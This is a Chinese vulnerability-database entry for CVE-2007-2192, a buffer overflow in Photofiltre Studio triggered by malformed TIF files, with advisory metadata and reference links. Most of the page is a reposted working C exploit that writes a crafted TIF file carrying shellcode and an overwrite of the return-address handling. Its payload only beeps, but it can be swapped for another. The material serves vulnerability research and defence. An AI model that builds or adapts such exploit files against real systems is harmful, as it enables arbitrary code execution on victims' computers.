Photofiltre Studio畸形TIF文件缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112752 漏洞类型 缓冲区溢出
发布时间 2007-04-21 更新时间 2007-04-25
CVE编号 CVE-2007-2192 CNNVD-ID CNNVD-200704-422
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/3772
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-422
|漏洞详情
PhotoFiltreStudio是来自法国的一款功能强大的图片编辑软件。PhotoFiltreStudio在处理畸形的.TIF图形文件时存在缓冲区溢出,可能导致执行任意指令。
|漏洞EXP
/********************************************************************************
*                                                                               *
*            Photofiltre Studio v8.1.1 .TIF File Buffer Overflow                *
*                                                                               *
*                                                                               *
* Photofiltre is vulnerable to an unspecified buffer overflow when processing a *
* crafted .TIF file.                                                            *
* This exploit just beeps (useless but incredibly noisy!!).                     *
*                                                                               *
* Tested against Win XP SP2 FR.                                                 *
* Have Fun!                                                                     *
*                                                                               *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                    *
********************************************************************************/

#include "stdio.h"
#include "stdlib.h"

// Beep Shellcode, made by xnull
// Woaw this is very ... Hum try it!
unsigned char beepsp2[] =
"\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC"
"\x77\x7A\x83\x7C"                      //Address \x77\x7A\x83\x7C = SP2
"\xC7\x44\x24\x04"
"\xD0\x03"                              //Length \xD0\x03 = 2000 (2 seconds)
"\x00\x00\xC7\x04\x24"
"\x01\x0E"                              //Frequency \x01\x0E = 3585
"\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3";

char tif_file_part1[] =
"\x49\x49\x2a\x00\x08\x00\x00\x00\x17\x00\xfe\x00\x04\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x01\x04\x00\x01\x00\x00\x00\xfd\x01"
"\x00\x00\x01\x01\x04\x00\x01\x00\x00\x00\xb6\x01\x00\x00\x02\x01"
"\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00\x83\x00"
"\x00\x00\x05\x00\x00\x00\x06\x01\x03\x00\x01\x00\x00\x00\x03\x00"
"\x00\x00\x0a\x01\xb6\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01"
"\x04\x00\x37\x00\x00\x00\x22\x01\x00\x00\x12\x01\x03\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x15\x01\x03\x00\x01\x00\x00\x00\x01\x00"
"\x00\x00\x16\x01\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01"
"\x04\x00\x37\x00\x00\x00\xfe\x01\x00\x00\x1a\x01\x05\x00\x01\x00"
"\x00\x00\xda\x02\x00\x00\x1b\x01\x05\x00\x01\x00\x00\x00\xe2\x02"
"\x00\x00\x1c\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x28\x01"
"\x03\x00\x01\x00\x00\x00\x02\x00\x00\x00\x29\x01\x03\x00\x02\x00"
"\x00\x00\x00\x00\x01\x00\x31\x01\x02\x44\x43\x42\x41\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4f\x4f\x4f\x4f\x4f"
"\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x92\x00\x92"
"\x00\x96\x00\x00\x00\x00\x00\xaf\x00\x12\x00\x00\x00\x92\x00\x49"
"\x00\x12\x00\x92\x00\xaf\x00\x92\x00\x49\x00\x49\x00\x49\x00\x58"
"\x00\xaf\x00\x12\x00\x58\x00\x00\x00\x80\x00\x00\x00\x57\x00\x12"
"\x00\x5a\x00\x12\x00\x00\x00\x00\x00\x28\x00\x12\x00\x00\x00\x46"
"\x00\xfd\x00\xd5\x00\x1b\x00\xff\x00\xef\x00\xa9\x00\xd9\x00\x00"
"\x00\x70\x00\x6c\x00\xfa\x00\x99\x00\xc5\x00\xf7\x00\xb4\x00\x48"
"\x00\xab\x00\xe9\x00\xde\x00\x1b\x00\xff\x00\xd7\x00\x64\x00\xa9"
"\x00\xd9\x00\x6e\x00\x68\x00\x70\x00\x92\x00\xcc\x00\xf2\x00\x99"
"\x00\x94\x00\xe9\x00\xad\x00\xb4\x00\x4b\x00\xc9\x00\x85\x00\xe9"
"\x00\xe5\x00\xb4\x00\x80\x00\x98\x00\x8c\x00\xe0\x00\xc4\x00\x33"
;

int main(int argc, char* argv[])
{
	FILE* tiffile;
	char evilbuff[5000];
	int offset=0;

	printf("[+] Photofiltre Studio v8.1.1 .TIF File Buffer Overflow\n");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
	if (argc!=2) {
		printf("[+] Usage: %s <file.ttf>\n",argv[0]);
		return 0;
	}

	memcpy(evilbuff,tif_file_part1,sizeof(tif_file_part1)-1);
	offset=0xd5;
	memcpy(evilbuff+offset,"\x43\x43\xeb\x05\x8c\x08\xfc\x7f\x43",9); //pop pop ret in ??? + jump over EIP
	memcpy(evilbuff+offset+9,beepsp2,sizeof(beepsp2)-1);

	printf("[+] tif_file_part2 patched!\n");
	
	if ((tiffile=fopen(argv[1],"wb"))==0) {
		printf("[-] Unable to access file.\n");
		return 0;
	}
	
	fwrite( evilbuff, 1, 1360, tiffile );
	fclose(tiffile);
	printf("[+] Done. Have fun!\n");
	return 0;
	
}

// milw0rm.com [2007-04-21]
|参考资料

来源:BID
名称:23582
链接:http://www.securityfocus.com/bid/23582
来源:MILW0RM
名称:3772
链接:http://www.milw0rm.com/exploits/3772
来源:OSVDB
名称:35265
链接:http://osvdb.org/35265
来源:XF
名称:photofiltre-tif-bo(33807)
链接:http://xforce.iss.net/xforce/xfdb/33807
来源:VUPEN
名称:ADV-2007-1490
链接:http://www.frsirt.com/english/advisories/2007/1490
来源:SECUNIA
名称:24981
链接:http://secunia.com/advisories/24981